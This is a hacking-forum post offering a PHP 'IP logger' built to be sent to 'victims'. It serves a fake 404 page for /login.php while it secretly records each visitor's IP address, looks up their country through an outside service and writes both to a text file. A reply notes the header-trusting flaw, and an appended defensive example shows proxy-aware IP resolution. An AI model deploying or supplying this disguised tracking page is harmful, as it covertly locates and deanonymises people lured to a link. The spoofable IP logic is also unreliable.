
Advanced IP Logger [PHP]

blackhunt

Here is an advanced IP logger in PHP that ensures the IP address is valid by going through several checks.

How it works

The process is really simple. When the victim enters the site, they will receive a 404 error message (which makes it look even more realistic). Then it gets the IP address of the victim, validates it and logs it in a txt file which contains the IP address, country and the current date.

The Code

PHP:
<?php
function get_ip_address()
{
    if (!empty($_SERVER['HTTP_CLIENT_IP']) && validate_ip($_SERVER['HTTP_CLIENT_IP'])) {
        return $_SERVER['HTTP_CLIENT_IP'];
    }
    if (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
        if (strpos($_SERVER['HTTP_X_FORWARDED_FOR'], ',') !== false) {
            $iplist = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
            foreach ($iplist as $ip) {
                if (validate_ip($ip))
                    return $ip;
            }
        } else {
            if (validate_ip($_SERVER['HTTP_X_FORWARDED_FOR']))
                return $_SERVER['HTTP_X_FORWARDED_FOR'];
        }
    }
    if (!empty($_SERVER['HTTP_X_FORWARDED']) && validate_ip($_SERVER['HTTP_X_FORWARDED']))
        return $_SERVER['HTTP_X_FORWARDED'];
    if (!empty($_SERVER['HTTP_X_CLUSTER_CLIENT_IP']) && validate_ip($_SERVER['HTTP_X_CLUSTER_CLIENT_IP']))
        return $_SERVER['HTTP_X_CLUSTER_CLIENT_IP'];
    if (!empty($_SERVER['HTTP_FORWARDED_FOR']) && validate_ip($_SERVER['HTTP_FORWARDED_FOR']))
        return $_SERVER['HTTP_FORWARDED_FOR'];
    if (!empty($_SERVER['HTTP_FORWARDED']) && validate_ip($_SERVER['HTTP_FORWARDED']))
        return $_SERVER['HTTP_FORWARDED'];
    return $_SERVER['REMOTE_ADDR'];
}
function validate_ip($ip)
{
    if (strtolower($ip) === 'unknown')
        return false;
    $ip = ip2long($ip);
    if ($ip !== false && $ip !== -1) {
        $ip = sprintf('%u', $ip);
        if ($ip >= 0 && $ip <= 50331647)
            return false;
        if ($ip >= 167772160 && $ip <= 184549375)
            return false;
        if ($ip >= 2130706432 && $ip <= 2147483647)
            return false;
        if ($ip >= 2851995648 && $ip <= 2852061183)
            return false;
        if ($ip >= 2886729728 && $ip <= 2887778303)
            return false;
        if ($ip >= 3221225984 && $ip <= 3221226239)
            return false;
        if ($ip >= 3232235520 && $ip <= 3232301055)
            return false;
        if ($ip >= 4294967040)
            return false;
    }
    return true;
}
$ip      = get_ip_address();
$json    = file_get_contents("http://extreme-ip-lookup.com/json/" . $ip);
$data    = json_decode($json, true);
$country = $data['country'] ?? 'unknown'; // lookup may fail or omit the field
$date    = date('d/m/Y');
$myfile  = fopen("ips.txt", "a+");        // append; file must already exist (see below)
fwrite($myfile, "Logged IP: ");
fwrite($myfile, $ip);
fwrite($myfile, " ($country), at ");
fwrite($myfile, $date);
fwrite($myfile, "\n");
fclose($myfile);
?>
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /login.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Remember to make a .txt file called "ips" in the same directory as the .php file.

Source: #Blackfourms
 
This is a fairly common mistake among web developers: treating the visitor's IP address as anything other than
Code:
$_SERVER['REMOTE_ADDR']
 
The first 56 lines can be replaced with this.
PHP:
foreach ($_SERVER as $key => $value)
    printf("%s : %s\n", $key, $value);
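The point raised in the reply above, seen from the defender's side, as an added example that is not part of the thread: a client-IP resolver that honours X-Forwarded-For only when the TCP peer (REMOTE_ADDR) is one of the deployment's own reverse proxies, so a header injected by a direct visitor is ignored. The proxy addresses and the two sample requests are constructed values.

```php
<?php
declare(strict_types=1);

// Added example, not from the thread. Assumption: the application sits behind
// the reverse proxies listed here (constructed sample values), and only those
// proxies append to X-Forwarded-For. Every other header value is client-supplied.
const TRUSTED_PROXIES = ['10.0.0.5', '10.0.0.6'];

/** True for a syntactically valid, non-private, non-reserved IPv4/IPv6 address. */
function is_public_ip(string $ip): bool
{
    return filter_var(trim($ip), FILTER_VALIDATE_IP,
        FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false;
}

/**
 * Resolve the client address from a $_SERVER-shaped array.
 * REMOTE_ADDR is the TCP peer and cannot be forged by a header. It is the
 * answer unless the peer is one of our proxies; only then is X-Forwarded-For
 * consulted, walking from the right (the part our proxies appended) and
 * returning the first hop that is not one of our proxies. Anything further
 * left was written by the client and is ignored.
 */
function client_ip(array $server, array $trusted = TRUSTED_PROXIES): string
{
    $remote = $server['REMOTE_ADDR'] ?? '';
    if (!in_array($remote, $trusted, true)) {
        return $remote;                      // direct connection: headers ignored
    }
    $hops = array_map('trim', explode(',', $server['HTTP_X_FORWARDED_FOR'] ?? ''));
    for ($i = count($hops) - 1; $i >= 0; $i--) {
        if (in_array($hops[$i], $trusted, true)) {
            continue;                        // appended by another of our proxies
        }
        return is_public_ip($hops[$i]) ? $hops[$i] : $remote;
    }
    return $remote;                          // header empty or only our proxies
}

// Constructed requests. Case 1: direct connection carrying a forged header.
$direct = ['REMOTE_ADDR' => '203.0.113.7', 'HTTP_X_FORWARDED_FOR' => '192.0.2.1'];
// Case 2: via our proxy; the client injected a fake first hop, the proxy
// appended the real peer address 198.51.100.9 as the last hop.
$proxied = ['REMOTE_ADDR' => '10.0.0.5',
            'HTTP_X_FORWARDED_FOR' => '192.0.2.1, 198.51.100.9'];
printf("direct:  %s\nproxied: %s\n", client_ip($direct), client_ip($proxied));
```

Any header other than the ones your own proxy is configured to set (X-Forwarded-For, Forwarded, or a vendor-specific one) should be left out entirely; the list of headers in the original post is exactly what lets a visitor choose the address that gets logged.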